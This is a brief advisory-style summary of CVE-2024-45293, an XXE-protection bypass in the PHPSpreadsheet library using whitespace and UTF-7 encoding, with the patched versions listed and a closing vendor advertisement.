CVE-2024-45293

Summary

CVE-2024-45293 is a vulnerability affecting the PHPSpreadsheet library, which can be exploited by attackers to bypass its XML Entity (XXE) attack prevention mechanism. By manipulating the XML structure with strategic use of white-spaces, attackers can craft Excel (XLSX) sheets to disclose sensitive information from servers that process these files using PHPSpreadsheet. The security scan function in PHPSpreadsheet's XmlScanner.php contains a flawed XML encoding check, where the library defaults to UTF-8 encoding if no encoding is defined, effectively bypassing the conversion logic. This issue allows the injection of UTF-7 encoded XXE payloads, enabling attackers to access and disclose sensitive data. Users are advised to upgrade to PHPSpreadsheet versions 1.29.1, 2.1.1, and 2.3.0 to mitigate this vulnerability, as there are currently no known workarounds.

Prevent cyber attacks with Recorded Future by prioritizing and patching critical vulnerabilities being exploited by threat actors targeting your industry. Book your demo to learn more.